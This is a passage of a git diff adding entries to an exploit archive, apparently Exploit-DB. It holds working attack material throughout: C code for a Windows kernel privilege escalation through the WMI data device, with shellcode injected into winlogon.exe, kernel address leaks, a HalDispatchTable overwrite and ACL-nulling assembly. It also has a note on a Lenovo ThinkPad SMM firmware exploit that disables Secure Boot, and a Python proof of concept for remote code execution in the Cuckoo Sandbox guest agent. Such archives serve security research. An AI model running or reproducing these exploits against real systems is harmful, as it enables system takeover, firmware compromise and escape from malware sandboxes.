+		"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
+		"\x65\x78\x65\x00";
+
+	wchar_t* str = L"winlogon.exe";
+	DWORD PID = getProcessId(str);
+	HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
+	pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
+	HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
+}
+
+BOOL leakHal()
+{
+	_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
+	PRTL_PROCESS_MODULES pModuleInfo;
+	DWORD ntoskrnlBase;
+	DWORD HalDTUser, HalDTOffset;
+	HMODULE userKernel;
+
+	pModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 0x100000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+	if (pModuleInfo == NULL)
+	{
+		printf("Could not allocate memory\n");
+		return FALSE;
+	}
+	NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, 0x100000, NULL);
+	ntoskrnlBase = (DWORD)pModuleInfo->Modules[0].ImageBase;
+	userKernel = LoadLibraryEx(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
+	if (userKernel == NULL)
+	{
+		printf("Could not load ntoskrnl.exe\n");
+		return FALSE;
+	}
+
+	HalDTUser = (DWORD)GetProcAddress(userKernel, "HalDispatchTable");
+	HalDTOffset = HalDTUser - (DWORD)userKernel;
+	g_HalDispatchTable = ntoskrnlBase + HalDTOffset + 0x9000;
+	return TRUE;
+}
+
+BOOL setup()
+{
+	LoadLibraryA("user32.dll");
+
+	wc.cbSize = sizeof(WNDCLASSEX);
+	wc.style = 0;
+	wc.lpfnWndProc = WProc;
+	wc.cbClsExtra = 0;
+	wc.cbWndExtra = 0;
+	wc.hInstance = NULL;
+	wc.hCursor = NULL;
+	wc.hIcon = NULL;
+	wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
+	wc.lpszMenuName = NULL;
+	wc.lpszClassName = g_windowClassName;
+	wc.hIconSm = NULL;
+
+	if (!RegisterClassEx(&wc))
+	{
+		printf("Failed to register window: %d\n", GetLastError());
+		return FALSE;
+	}
+	g_window = CreateWindowEx(WS_EX_CLIENTEDGE, g_windowClassName, L"Victim_Window", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
+	if (g_window == NULL)
+	{
+		printf("Failed to create window: %d\n", GetLastError());
+		return FALSE;
+	}
+
+	g_pSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32.dll"), "gSharedInfo");
+	g_UserHandleTable = g_pSharedInfo->aheList;
+	g_pServerInfo = g_pSharedInfo->psi;
+
+	return TRUE;
+}
+
+DWORD leakWndAddr(HWND hwnd)
+{
+	DWORD addr = 0;
+	HWND kernelHandle = NULL;
+
+	for (int i = 0; i < g_pServerInfo->cHandleEntries; i++)
+	{
+		kernelHandle = (HWND)(i | (g_UserHandleTable[i].wUniq << 0x10));
+		if (kernelHandle == hwnd)
+		{
+			addr = (DWORD)g_UserHandleTable[i].phead;
+			break;
+		}
+	}
+	return addr;
+}
+
+VOID SprayKernelStack() {
+	g_ZwMapUserPhysicalPages ZwMapUserPhysicalPages = (g_ZwMapUserPhysicalPages)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "ZwMapUserPhysicalPages");
+	if (ZwMapUserPhysicalPages == NULL)
+	{
+		printf("Could not get ZwMapUserPhysicalPages\n");
+		return;
+	}
+	BYTE buffer[4096];
+	DWORD value = g_HalDispatchTable - 0x3C + 0x4;
+	for (int i = 0; i < sizeof(buffer) / 4; i++)
+	{
+		memcpy(buffer + i * 4, &value, sizeof(DWORD));
+	}
+	printf("Where is at: 0x%x\n", buffer);
+	ZwMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
+}
+
+__declspec(noinline) int Shellcode()
+{
+	__asm {
+		mov eax, kHandle // WND - Which window? Check this
+		mov eax, [eax + 8] // THREADINFO
+		mov eax, [eax] // ETHREAD
+		mov eax, [eax + 0x150] // KPROCESS
+		mov eax, [eax + 0xb8] // flink
+		procloop:
+		lea edx, [eax - 0xb8] // KPROCESS
+		mov eax, [eax]
+		add edx, 0x16c // module name
+		cmp dword ptr[edx], 0x6c6e6977 // �winl� for winlogon.exe
+		jne procloop
+		sub edx, 0x170
+		mov dword ptr[edx], 0x0 // NULL ACL
+		ret
+	}
+}
+
+int main() {
+	DWORD dwBytesReturned;
+	HANDLE threadhandle;
+	WMIRECEIVENOTIFICATION buffer;
+	CHAR OutPut[1000];
+
+	if (!setup())
+	{
+		printf("Could not setup window\n");
+		return 0;
+	}
+
+
+	PVOID userSC = VirtualAlloc((VOID*)0x2a000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+	kHandle = (void*)leakWndAddr(g_window);
+	memset(userSC, 0x41, 0x1000);
+	memcpy(userSC, Shellcode, 0x40);
+
+
+	if (!leakHal())
+	{
+		printf("Could not leak Hal\n");
+		return 0;
+	}
+	printf("HalDispatchTable is at: 0x%x\n", g_HalDispatchTable);
+
+	DWORD value = (DWORD)userSC;
+	PBYTE buff = (PBYTE)&buffer;
+	for (int i = 0; i < sizeof(buffer) / 4; i++)
+	{
+		memcpy(buff + i * 4, &value, sizeof(DWORD));
+	}
+	printf("What is at: 0x%x\n", buff);
+
+	buffer.HandleCount = 0;
+	buffer.Action = RECEIVE_ACTION_CREATE_THREAD;
+	buffer.UserModeProcess.Handle = GetCurrentProcess();
+
+	HANDLE hDriver = CreateFileA("\\\\.\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+	if (hDriver != INVALID_HANDLE_VALUE) {
+		SprayKernelStack();
+
+		if (!DeviceIoControl(hDriver, IOCTL_WMI_RECEIVE_NOTIFICATIONS, &buffer, sizeof(buffer), &OutPut, sizeof(OutPut), &dwBytesReturned, NULL)) {
+			return 1;
+		}
+
+	}
+	_NtQueryIntervalProfile NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryIntervalProfile");
+	ULONG result;
+	KPROFILE_SOURCE stProfile = ProfileTotalIssues;
+	NtQueryIntervalProfile(stProfile, &result);
+	printf("SYSTEM shell comming\n");
+	Launch();
+	printf("All done, exiting\n");
+
+	return 0;
+}
+
diff --git a/platforms/windows/local/40040.txt b/platforms/windows/local/40040.txt
new file mode 100755
index 000000000..99da3fb40
--- /dev/null
+++ b/platforms/windows/local/40040.txt
@@ -0,0 +1,16 @@
+Source: https://github.com/Cr4sh/ThinkPwn
+
+ Lenovo ThinkPad System Management Mode arbitrary code execution exploit
+
+***************************************************************************
+
+For more information about this project please read the following article:
+
+http://blog.cr4.sh/2016/06/exploring-and-exploiting-lenovo.html
+
+
+This code exploits 0day privileges escalation vulnerability (or backdoor?) in SystemSmmRuntimeRt UEFI driver (GUID is 7C79AC8C-5E6C-4E3D-BA6F-C260EE7C172E) of Lenovo firmware. Vulnerability is present in all of the ThinkPad series laptops, the oldest one that I have checked is X220 and the neweset one is T450s (with latest firmware versions available at this moment). Running of arbitrary System Management Mode code allows attacker to disable flash write protection and infect platform firmware, disable Secure Boot, bypass Virtual Secure Mode (Credential Guard, etc.) on Windows 10 Enterprise and do others evil things.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40040.zip
diff --git a/platforms/windows/local/40043.py b/platforms/windows/local/40043.py
new file mode 100755
index 000000000..93d6a7bfd
--- /dev/null
+++ b/platforms/windows/local/40043.py
@@ -0,0 +1,81 @@
+# -*- coding: utf8 -*-
+"""
+# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
+# Date: June 28th 2016
+# Exploit Author: Rémi ROCHER
+# Vendor Homepage: https://cuckoosandbox.org/
+# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
+# Version: <= 2.0.1
+# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
+# CVE : None
+
+--[ NAME
+
+Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
+
+--[ DESCRIPTION
+
+Cuckoo Sandbox is Free Software, basically used by researchers to analyze
+(potential) malware behavior. It is also implemented industrially by
+private companies for detecting potential threats within IT Networks
+featuring dedicated so-called security appliances.
+
+This basic Proof of Concept exploit is spawning  a calc.exe process with
+Administrator privileges, assuming:
+    * The Cuckoo agent.py is running with Admin privileges (should be
+the case)
+    * The current user can access a local interface (should be the case)
+    * Optional for true Remote Code Execution: External equipment can
+    access the XMLRPC port (default 8000).
+
+One may also call the complete() method in order to stop any further
+detection
+or screenshot.
+
+Such vulnerabilities can be used to either trick the very detection
+system, or
+potentially escape the sandbox machine itself. An attacker could also
+exploit
+such bugs as a pivot in order to attack sensitive systems.
+
+--[ AUTHORS
+
+* Rémi ROCHER - Armature Technologies
+* Thomas MARTHÉLY- Armature Technologies
+
+--[ RESOURCE
+* Repository: https://github.com/cuckoosandbox/cuckoo
+
+
+"""
+import xmlrpclib
+from StringIO import StringIO
+from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED
+
+
+def execute(x, cmd="cmd /c start"):
+    output = StringIO()
+    file = ZipFile(output, "w", ZIP_STORED)
+    info = ZipInfo("analyzer.py")
+    info.compress_type = ZIP_DEFLATED
+
+    content = ("""
+import subprocess
+
+if __name__ == "__main__":
+  subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)
+
+""" % cmd)
+    file.writestr(info, content)
+    file.close()
+
+    data = xmlrpclib.Binary(output.getvalue())
+
+    if x.add_analyzer(data):
+        return x.execute()
+
+
+if __name__ == "__main__":
+    x = xmlrpclib.ServerProxy("http://localhost:8000")
+    execute(x, "calc.exe")
+    # x.complete() #  Blackout mode
\ No newline at end of file